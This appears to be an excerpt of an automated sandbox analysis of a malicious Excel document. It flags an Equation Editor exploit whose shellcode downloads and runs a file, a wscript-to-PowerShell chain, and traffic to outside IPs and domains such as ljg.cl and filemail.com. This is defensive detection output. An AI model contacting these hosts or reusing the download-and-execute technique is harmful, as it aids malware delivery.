    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49168 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49169 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49170 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49175 version: TLS 1.0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000D.00000002.472460335.0000000005046000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Shellcode detected
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035705DC
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0357060A ShellExecuteW,ExitProcess,9_2_0357060A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_03570509 LoadLibraryW,9_2_03570509
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035705F5 ShellExecuteW,ExitProcess,9_2_035705F5
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_03570404 ExitProcess,9_2_03570404
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0357062F ExitProcess,9_2_0357062F
    Suspicious execution chain found
    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: ljg.cl
    Source: global trafficDNS query: name: 3105.filemail.com
    Source: global trafficDNS query: name: 3105.filemail.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
